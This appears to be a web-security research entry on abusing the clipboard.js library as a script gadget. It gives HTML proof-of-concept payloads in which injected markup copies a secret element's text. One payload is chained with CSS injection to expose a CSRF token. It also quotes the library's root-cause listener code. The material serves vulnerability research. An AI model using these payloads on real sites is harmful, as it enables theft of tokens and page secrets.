Modern copy to clipboard. No Flash. Just 3kb gzipped.
This gadget is special, it allows copying the content (text) of any element specified by a selector in the data-clipboard-target attribute. When combined with an <a> tag with an additional click on the attacker’s website, it can be used to steal the contents of the clipboard.
The clipboard.js library uses “good-listener” to listen to events. This library delegates event listeners to the document, allowing them to be triggered at any time.
<div id="to_copy">Secret</div>
<!-- user input -->
<a href="https://https://gmsgadget.com/" class="copy-link" data-clipboard-action="copy" data-clipboard-target="#to_copy">Copy Text</a>
<script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.11/clipboard.min.js"></script>
<script>
new ClipboardJS(".copy-link");
</script>When chained with a CSS injection, it is possible to display block script content to steal sensitive values such as CSRF tokens.
<script id="to_copy">CSRF_TOKEN=1234567890</script>
<!-- user input -->
<a href="https://https://gmsgadget.com/" class="copy-link" data-clipboard-action="copy" data-clipboard-target="#to_copy">Copy Text</a>
<style> * { display: block } </style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.11/clipboard.min.js"></script>
<script>
new ClipboardJS(".copy-link");
</script>Root Cause
listenClick(trigger) {
this.listener = listen(trigger, 'click', (e) => this.onClick(e));
}
Found by @kevin_mizu.